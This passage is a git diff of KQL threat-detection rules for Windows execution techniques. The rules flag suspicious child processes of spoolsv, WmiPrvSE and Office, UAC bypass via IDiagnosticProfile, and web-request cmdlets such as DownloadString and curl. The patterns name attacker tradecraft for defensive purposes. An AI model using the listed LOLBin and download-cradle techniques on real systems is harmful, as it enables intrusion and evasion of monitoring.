+++ b/KQL/rules/Execution/suspicious_spool_service_child_process.kql @@ -1,10 +1,10 @@ -// Title: Suspicious Spool Service Child Process -// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule) -// Date: 2021-07-11 -// Level: high -// Description: Detects suspicious print spool service (spoolsv.exe) child processes. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203, attack.privilege-escalation, attack.t1068 - -DeviceProcessEvents +// Title: Suspicious Spool Service Child Process +// Author: Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule) +// Date: 2021-07-11 +// Level: high +// Description: Detects suspicious print spool service (spoolsv.exe) child processes. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, attack.privilege-escalation, attack.t1068 + +DeviceProcessEvents | where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\spoolsv.exe") and ((FolderPath endswith "\\gpupdate.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\taskmgr.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\findstr.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\wget.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\fsutil.exe" or FolderPath endswith "\\cipher.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\write.exe" or FolderPath endswith "\\wuauclt.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") or ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") and (not(ProcessCommandLine contains "start"))) or (FolderPath endswith "\\cmd.exe" and (not((ProcessCommandLine contains ".spl" or ProcessCommandLine contains "route add" or ProcessCommandLine contains "program files")))) or (FolderPath endswith "\\netsh.exe" and (not((ProcessCommandLine contains "add portopening" or ProcessCommandLine contains "rule name")))) or ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (not(ProcessCommandLine contains ".spl"))) or (ProcessCommandLine endswith "rundll32.exe" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql b/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql index ed17f3de..462ed156 100644 --- a/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql +++ b/KQL/rules/Execution/suspicious_use_of_csharp_interactive_console.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Use of CSharp Interactive Console -// Author: Michael R. (@nahamike01) -// Date: 2020-03-08 -// Level: high -// Description: Detects the execution of CSharp interactive console by PowerShell -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1127 -// False Positives: -// - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc. - -DeviceProcessEvents +// Title: Suspicious Use of CSharp Interactive Console +// Author: Michael R. (@nahamike01) +// Date: 2020-03-08 +// Level: high +// Description: Detects the execution of CSharp interactive console by PowerShell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1127 +// False Positives: +// - Possible depending on environment. Pair with other factors such as net connections, command-line args, etc. + +DeviceProcessEvents | where FolderPath endswith "\\csi.exe" and ProcessVersionInfoOriginalFileName =~ "csi.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql b/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql index 2378d6b1..ebd0dfea 100644 --- a/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql +++ b/KQL/rules/Execution/suspicious_windowsterminal_child_processes.kql @@ -1,12 +1,12 @@ -// Title: Suspicious WindowsTerminal Child Processes -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-25 -// Level: medium -// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence -// False Positives: -// - Other legitimate "Windows Terminal" profiles - -DeviceProcessEvents +// Title: Suspicious WindowsTerminal Child Processes +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-25 +// Level: medium +// Description: Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence +// False Positives: +// - Other legitimate "Windows Terminal" profiles + +DeviceProcessEvents | where ((InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") and ((FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\csc.exe") or (FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\TEMP\\") or (ProcessCommandLine contains " iex " or ProcessCommandLine contains " icm" or ProcessCommandLine contains "Invoke-" or ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo " or ProcessCommandLine contains "DownloadString(" or ProcessCommandLine contains " /c " or ProcessCommandLine contains " /k " or ProcessCommandLine contains " /r "))) and (not(((ProcessCommandLine contains "Import-Module" and ProcessCommandLine contains "Microsoft.VisualStudio.DevShell.dll" and ProcessCommandLine contains "Enter-VsDevShell") or (ProcessCommandLine contains "\\AppData\\Local\\Packages\\Microsoft.WindowsTerminal_" and ProcessCommandLine contains "\\LocalState\\settings.json") or (ProcessCommandLine contains "C:\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "\\Common7\\Tools\\VsDevCmd.bat")))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql b/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql index 53421d60..ccfee321 100644 --- a/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql +++ b/KQL/rules/Execution/suspicious_wmic_execution_via_office_process.kql @@ -1,10 +1,10 @@ -// Title: Suspicious WMIC Execution Via Office Process -// Author: Vadim Khrykov, Cyb3rEng -// Date: 2021-08-23 -// Level: high -// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). -// MITRE Tactic: Execution -// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense-evasion - -DeviceProcessEvents +// Title: Suspicious WMIC Execution Via Office Process +// Author: Vadim Khrykov, Cyb3rEng +// Date: 2021-08-23 +// Level: high +// Description: Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin). +// MITRE Tactic: Execution +// Tags: attack.t1204.002, attack.t1047, attack.t1218.010, attack.execution, attack.defense-evasion + +DeviceProcessEvents | where (InitiatingProcessFolderPath endswith "\\WINWORD.EXE" or InitiatingProcessFolderPath endswith "\\EXCEL.EXE" or InitiatingProcessFolderPath endswith "\\POWERPNT.exe" or InitiatingProcessFolderPath endswith "\\MSPUB.exe" or InitiatingProcessFolderPath endswith "\\VISIO.exe" or InitiatingProcessFolderPath endswith "\\MSACCESS.EXE" or InitiatingProcessFolderPath endswith "\\EQNEDT32.EXE" or InitiatingProcessFolderPath endswith "\\ONENOTE.EXE" or InitiatingProcessFolderPath endswith "\\wordpad.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and ((ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "msiexec" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "verclsid" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (ProcessCommandLine contains "process" and ProcessCommandLine contains "create" and ProcessCommandLine contains "call")) and (FolderPath endswith "\\wbem\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql b/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql index 96ab164a..b128404b 100644 --- a/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql +++ b/KQL/rules/Execution/suspicious_wmiprvse_child_process.kql @@ -1,10 +1,10 @@ -// Title: Suspicious WmiPrvSE Child Process -// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) -// Date: 2021-08-23 -// Level: high -// Description: Detects suspicious and uncommon child processes of WmiPrvSE -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1047, attack.t1204.002, attack.t1218.010 - -DeviceProcessEvents +// Title: Suspicious WmiPrvSE Child Process +// Author: Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems) +// Date: 2021-08-23 +// Level: high +// Description: Detects suspicious and uncommon child processes of WmiPrvSE +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1047, attack.t1204.002, attack.t1218.010 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\wbem\\WmiPrvSE.exe" and ((FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wscript.exe") or ((ProcessCommandLine contains "cscript" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript") and FolderPath endswith "\\cmd.exe")) and (not(((ProcessCommandLine contains "/i " and FolderPath endswith "\\msiexec.exe") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql b/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql index 53a4cc71..3bf781cb 100644 --- a/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql +++ b/KQL/rules/Execution/suspicious_wsman_provider_image_loads.kql @@ -1,10 +1,10 @@ -// Title: Suspicious WSMAN Provider Image Loads -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-06-24 -// Level: medium -// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.lateral-movement, attack.t1021.003 - -DeviceImageLoadEvents +// Title: Suspicious WSMAN Provider Image Loads +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-06-24 +// Level: medium +// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.lateral-movement, attack.t1021.003 + +DeviceImageLoadEvents | where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\PowerShell\\6\\pwsh.exe", "C:\\Program Files (x86)\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\6\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")) or InitiatingProcessFolderPath endswith "\\mmc.exe" or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Execution/suspicious_zipexec_execution.kql b/KQL/rules/Execution/suspicious_zipexec_execution.kql index 345496a5..7b76e407 100644 --- a/KQL/rules/Execution/suspicious_zipexec_execution.kql +++ b/KQL/rules/Execution/suspicious_zipexec_execution.kql @@ -1,10 +1,10 @@ -// Title: Suspicious ZipExec Execution -// Author: frack113 -// Date: 2021-11-07 -// Level: medium -// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 - -DeviceProcessEvents +// Title: Suspicious ZipExec Execution +// Author: frack113 +// Date: 2021-11-07 +// Level: medium +// Description: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents | where (ProcessCommandLine contains "/generic:Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/user:") or (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "Microsoft_Windows_Shell_ZipFolder:filename=" and ProcessCommandLine contains ".zip") \ No newline at end of file diff --git a/KQL/rules/Execution/sysprep_on_appdata_folder.kql b/KQL/rules/Execution/sysprep_on_appdata_folder.kql index 312d562c..a6d9a25b 100644 --- a/KQL/rules/Execution/sysprep_on_appdata_folder.kql +++ b/KQL/rules/Execution/sysprep_on_appdata_folder.kql @@ -1,12 +1,12 @@ -// Title: Sysprep on AppData Folder -// Author: Florian Roth (Nextron Systems) -// Date: 2018-06-22 -// Level: medium -// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - False positives depend on scripts and administrative tools used in the monitored environment - -DeviceProcessEvents +// Title: Sysprep on AppData Folder +// Author: Florian Roth (Nextron Systems) +// Date: 2018-06-22 +// Level: medium +// Description: Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - False positives depend on scripts and administrative tools used in the monitored environment + +DeviceProcessEvents | where ProcessCommandLine contains "\\AppData\\" and FolderPath endswith "\\sysprep.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql index 413f2168..19edcb23 100644 --- a/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/system_disk_and_volume_reconnaissance_via_wmic_exe.kql @@ -1,12 +1,12 @@ -// Title: System Disk And Volume Reconnaissance Via Wmic.EXE -// Author: Stephen Lincoln '@slincoln-aiq' (AttackIQ) -// Date: 2024-02-02 -// Level: medium -// Description: An adversary might use WMI to discover information about the system, such as the volume name, size, -// free space, and other disk information. This can be done using the 'wmic' command-line utility and has been -// observed being used by threat actors such as Volt Typhoon. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082 - -DeviceProcessEvents +// Title: System Disk And Volume Reconnaissance Via Wmic.EXE +// Author: Stephen Lincoln '@slincoln-aiq' (AttackIQ) +// Date: 2024-02-02 +// Level: medium +// Description: An adversary might use WMI to discover information about the system, such as the volume name, size, +// free space, and other disk information. This can be done using the 'wmic' command-line utility and has been +// observed being used by threat actors such as Volt Typhoon. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082 + +DeviceProcessEvents | where ((ProcessCommandLine contains " volumename" or ProcessCommandLine contains " logicaldisk") or (ProcessCommandLine contains "path" and ProcessCommandLine contains "win32_logicaldisk") or (ProcessCommandLine contains " volume" and ProcessCommandLine contains " list ")) and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql index 8451760c..fc8d05a7 100644 --- a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql +++ b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using IDiagnostic Profile -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-03 -// Level: high -// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceProcessEvents +// Title: UAC Bypass Using IDiagnostic Profile +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects the "IDiagnosticProfileUAC" UAC bypass technique +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents | where (ProcessIntegrityLevel in~ ("High", "System", "S-1-16-16384", "S-1-16-12288")) and InitiatingProcessCommandLine contains " /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}" and InitiatingProcessFolderPath endswith "\\DllHost.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql index 02b38d0c..a21f5527 100644 --- a/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql +++ b/KQL/rules/Execution/uac_bypass_using_idiagnostic_profile_file.kql @@ -1,10 +1,10 @@ -// Title: UAC Bypass Using IDiagnostic Profile - File -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-03 -// Level: high -// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 - -DeviceFileEvents +// Title: UAC Bypass Using IDiagnostic Profile - File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-03 +// Level: high +// Description: Detects the creation of a file by "dllhost.exe" in System32 directory part of "IDiagnosticProfileUAC" UAC bypass technique +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\DllHost.exe" and FolderPath endswith ".dll" and FolderPath startswith "C:\\Windows\\System32\\" \ No newline at end of file diff --git a/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql b/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql index d2c81021..866673e4 100644 --- a/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql +++ b/KQL/rules/Execution/uncommon_child_process_of_bginfo_exe.kql @@ -1,10 +1,10 @@ -// Title: Uncommon Child Process Of BgInfo.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community -// Date: 2019-10-26 -// Level: medium -// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202 - -DeviceProcessEvents +// Title: Uncommon Child Process Of BgInfo.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community +// Date: 2019-10-26 +// Level: medium +// Description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.005, attack.defense-evasion, attack.t1218, attack.t1202 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\bginfo.exe" or InitiatingProcessFolderPath endswith "\\bginfo64.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql b/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql index fb2d3f93..14855785 100644 --- a/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql +++ b/KQL/rules/Execution/uncommon_child_processes_of_sndvol_exe.kql @@ -1,10 +1,10 @@ -// Title: Uncommon Child Processes Of SndVol.exe -// Author: X__Junior (Nextron Systems) -// Date: 2023-06-09 -// Level: medium -// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Uncommon Child Processes Of SndVol.exe +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-09 +// Level: medium +// Description: Detects potentially uncommon child processes of SndVol.exe (the Windows volume mixer) +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\SndVol.exe" and (not((ProcessCommandLine contains " shell32.dll,Control_RunDLL " and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql b/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql index dfb5c5c1..63a78489 100644 --- a/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql +++ b/KQL/rules/Execution/uncommon_one_time_only_scheduled_task_at_00_00.kql @@ -1,12 +1,12 @@ -// Title: Uncommon One Time Only Scheduled Task At 00:00 -// Author: pH-T (Nextron Systems) -// Date: 2022-07-15 -// Level: high -// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005 -// False Positives: -// - Software installation - -DeviceProcessEvents +// Title: Uncommon One Time Only Scheduled Task At 00:00 +// Author: pH-T (Nextron Systems) +// Date: 2022-07-15 +// Level: high +// Description: Detects scheduled task creation events that include suspicious actions, and is run once at 00:00 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.persistence, attack.privilege-escalation, attack.t1053.005 +// False Positives: +// - Software installation + +DeviceProcessEvents | where (ProcessCommandLine contains "wscript" or ProcessCommandLine contains "vbscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "wmic " or ProcessCommandLine contains "wmic.exe" or ProcessCommandLine contains "regsvr32.exe" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "\\AppData\\") and (FolderPath contains "\\schtasks.exe" or ProcessVersionInfoOriginalFileName =~ "schtasks.exe") and (ProcessCommandLine contains "once" and ProcessCommandLine contains "00:00") \ No newline at end of file diff --git a/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql b/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql index e53fcc0e..0c4781c7 100644 --- a/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql +++ b/KQL/rules/Execution/unusual_parent_process_for_cmd_exe.kql @@ -1,10 +1,10 @@ -// Title: Unusual Parent Process For Cmd.EXE -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-21 -// Level: medium -// Description: Detects suspicious parent process for cmd.exe -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 - -DeviceProcessEvents +// Title: Unusual Parent Process For Cmd.EXE +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-21 +// Level: medium +// Description: Detects suspicious parent process for cmd.exe +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents | where FolderPath endswith "\\cmd.exe" and (InitiatingProcessFolderPath endswith "\\csrss.exe" or InitiatingProcessFolderPath endswith "\\ctfmon.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\epad.exe" or InitiatingProcessFolderPath endswith "\\FlashPlayerUpdateService.exe" or InitiatingProcessFolderPath endswith "\\GoogleUpdate.exe" or InitiatingProcessFolderPath endswith "\\jucheck.exe" or InitiatingProcessFolderPath endswith "\\jusched.exe" or InitiatingProcessFolderPath endswith "\\LogonUI.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\SearchIndexer.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\SIHClient.exe" or InitiatingProcessFolderPath endswith "\\sihost.exe" or InitiatingProcessFolderPath endswith "\\slui.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\sppsvc.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\unsecapp.exe" or InitiatingProcessFolderPath endswith "\\WerFault.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wlanext.exe" or InitiatingProcessFolderPath endswith "\\WUDFHost.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql b/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql index eca7786c..4470135b 100644 --- a/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql +++ b/KQL/rules/Execution/usage_of_web_request_commands_and_cmdlets.kql @@ -1,12 +1,12 @@ -// Title: Usage Of Web Request Commands And Cmdlets -// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger -// Date: 2019-10-24 -// Level: medium -// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. - -DeviceProcessEvents +// Title: Usage Of Web Request Commands And Cmdlets +// Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger +// Date: 2019-10-24 +// Level: medium +// Description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer. + +DeviceProcessEvents | where ProcessCommandLine contains "[System.Net.WebRequest]::create" or ProcessCommandLine contains "curl " or ProcessCommandLine contains "Invoke-RestMethod" or ProcessCommandLine contains "Invoke-WebRequest" or ProcessCommandLine contains " irm " or ProcessCommandLine contains "iwr " or ProcessCommandLine contains "Resume-BitsTransfer" or ProcessCommandLine contains "Start-BitsTransfer" or ProcessCommandLine contains "wget " or ProcessCommandLine contains "WinHttp.WinHttpRequest" \ No newline at end of file diff --git a/KQL/rules/Execution/use_of_fsharp_interpreters.kql b/KQL/rules/Execution/use_of_fsharp_interpreters.kql index d49fc8e5..26f958b5 100644 --- a/KQL/rules/Execution/use_of_fsharp_interpreters.kql +++ b/KQL/rules/Execution/use_of_fsharp_interpreters.kql @@ -1,13 +1,13 @@ -// Title: Use of FSharp Interpreters -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022-06-02 -// Level: medium -// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" -// Both can be used for AWL bypass and to execute F# code via scripts or inline. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059 -// False Positives: -// - Legitimate use by a software developer. - -DeviceProcessEvents +// Title: Use of FSharp Interpreters +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-02 +// Level: medium +// Description: Detects the execution of FSharp Interpreters "FsiAnyCpu.exe" and "FSi.exe" +// Both can be used for AWL bypass and to execute F# code via scripts or inline. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 +// False Positives: +// - Legitimate use by a software developer. + +DeviceProcessEvents | where (FolderPath endswith "\\fsi.exe" or FolderPath endswith "\\fsianycpu.exe") or 